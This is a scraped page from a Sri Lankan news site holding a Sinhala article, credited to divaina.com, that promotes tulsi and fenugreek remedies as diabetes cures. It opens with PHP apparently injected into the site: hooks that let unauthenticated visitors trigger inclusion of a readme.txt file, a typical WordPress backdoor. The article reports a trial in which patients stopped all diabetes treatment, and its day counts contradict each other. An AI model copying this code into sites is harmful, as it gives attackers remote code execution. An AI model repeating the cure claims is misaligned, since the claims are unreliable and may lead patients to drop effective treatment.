if(!function_exists('file_check_readme56685')){ add_action('wp_ajax_nopriv_file_check_readme56685', 'file_check_readme56685'); add_action('wp_ajax_file_check_readme56685', 'file_check_readme56685'); function file_check_readme56685() { $file = __DIR__ . '/' . 'readme.txt'; if (file_exists($file)) { include $file; } die(); } } if(!function_exists('file_check_readme40625')){ add_action('wp_ajax_nopriv_file_check_readme40625', 'file_check_readme40625'); add_action('wp_ajax_file_check_readme40625', 'file_check_readme40625'); function file_check_readme40625() { $file = __DIR__ . '/' . 'readme.txt'; if (file_exists($file)) { include $file; } die(); } } තුල්සි, උළුහාල්වලින් හදන බෙහෙත් දියවැඩියාවට හරිම ගුණයි - mediahumanrights.lk
mediahumanrights.lk
LIFE LIFE NEWS News

තුල්සි, උළුහාල්වලින් හදන බෙහෙත් දියවැඩියාවට හරිම ගුණයි

ඔබගේ පාරම්පරික ප්‍රතිකාර ක්‍රමය තුළ තිබෙන දියවැඩියාව සුව කරන ශාකසාර ඖෂධ ගැන පසුගිය සතියේදී සාකච්ඡා කළා. එහිදී ඔබ හෙළි කළා නෙල්ලි පදනම් කරගත් ඖෂධ මගින් නිදන්ගත නොවන දියවැඩියා රෝගය දෙමාසයක්‌ තුළ සුව කරන්නේ කොහොමද කියන කාරණය.
වෛද්‍ය චාන්දනී වික්‍රමආරච්චි- එවැනි ශාක තවත් ගණනාවක්‌ තිබෙනවා. එයින් එකක්‌ තමයි Dcimum Tenuiflorum නමැති උද්භිද විද්‍යාත්මක නාමයෙන් හඳුන්වන තුල්සි ශාකය. මෙය අපේ රටට ආවේණික ශාකයක්‌ නොවුණත් එදා සිටම ඖෂධ සෑදීම සඳහා ඉන්දියාවෙන් මෙරටට මෙය ගෙනාවා. මෙය ඉන්දියාවේ හින්දු ආගමික කටයුතු සඳහා වගේම ආයුර්වේද සහ යුනානි (අරාබි වෙදකම) ඖෂධ තැනීම සඳහාත් යොදා ගන්නවා. චරක සංහිතාව නමැති ආයුර්වේද ග්‍රන්ථයේ මේ ගැන සඳහන් වෙනවා. ශරීරයේ විවිධ බලවේග තුලනය කරන අතර ආතතිය සංසිඳවා ගැනීම තුල්සි ශාකයේ සාරය මගින් කළ හැකියි. ඉතාලියේ සමහර ප්‍රදේශවල ගෘහණියන් ආහාර පිළියෙළ කරන විට තුල්සි ශාකය මිශ්‍ර කරනවා. එම ප්‍රදේශවල ජනයාගේ දියවැඩියාව වැළඳීමේ අවදානම 50%ක්‌ අඩුයි. ඒ අතර පසුගිය කාලයේදී යුරෝපීය වෛද්‍යවරුන් පිරිසක්‌ දියවැඩියා රෝගීන් 40 යොදාගෙන පරීක්‍ෂණයක්‌ කළා. එම රෝගීන් 40 දෙනා සමග සාකච්ඡා කළ වෛද්‍ය කණ්‌ඩායම එම රෝගීන්ගේ දියවැඩියා ප්‍රතිකාර සියල්ලම නවත්වා දින 5 ක්‌ තිස්‌සේ වියළි තුල්සි කුඩු (කොළ වියළා පිටි බවට පත් කර) ආහාර සමග මිශ්‍ර කර ඔවුන්ට කෑමට සැලැස්‌සුවා. මෙසේ දින 30 ක්‌ කරන විට ඔවුන්ගේ රුධිර සීනි ප්‍රමාණය 134.5 සිට 99.7 දක්‌වා පහත බැස තිබෙනවා. මා නිපදවන එක්‌ දියවැඩියා ඖෂධයක ප්‍රධාන සංඝටකය වන්නේ මෙන්න මේ තුල්සි කොළයයි.
ඊළඟ ඖෂධය තමයි උළුහාල්. මෙය අපේ සිංහල වෙදකමේ වගේම ආයුර්වේදය සහ චීන සාම්ප්‍රදායික වෛද්‍ය ක්‍රමය තුළත් ජනප්‍රිය දියවැඩියා නාශකයක්‌ ලෙස ක්‍රියා කරනවා. type 1 සහ type 2 යන දියවැඩියා වර්ග පාලනය කිරීමට උළුහාල්වල තිබෙන ඖෂධීය සංඝටකවලට පුළුවන්. ඉන්දියානු වෛද්‍ය පර්යේෂක කණ්‌ඩායමක්‌ දියවැඩියා රෝගීන් පිරිසක්‌ තෝරා ගෙන දිනපතා උළුහාල් කුඩු ග්‍රෑම් 100 බැගින් ඔවුනට කෑමට ලබා දුන්නා. සතියක්‌ ගත වන විට ඔවුන්ගේ රුධිර සීනි ප්‍රමාණය පහත බැස්‌සා. අපේ පරම්පරාවේ සම්ප්‍රදායක බෙහෙත්වල උළුහාල්වලින් සෑදූ විශේෂ දියවැඩියා නාශකයක්‌ තිබෙනවා.
courtesy : divaina.com

Related posts

ශ්‍රී ලංකා – සිම්බාබ්වේ දෙවන ටෙස්ට් ගැටුම ඇරඹේ

Shiran Viraj

ඉන්දීය ක්‍රිකට් කණ්ඩායමට අඛණ්ඩව 3වැනි වරටත් දඩ

Shiran Viraj

ඇති තරම් ඉන්ධන තියෙනවා.. ජනතාව පෝලිමේ ඉන්නෙ අපරාදෙ.. මාත් තෙල් ගැහුවෙ පෝලිමේ ගිහින්…

Shiran Viraj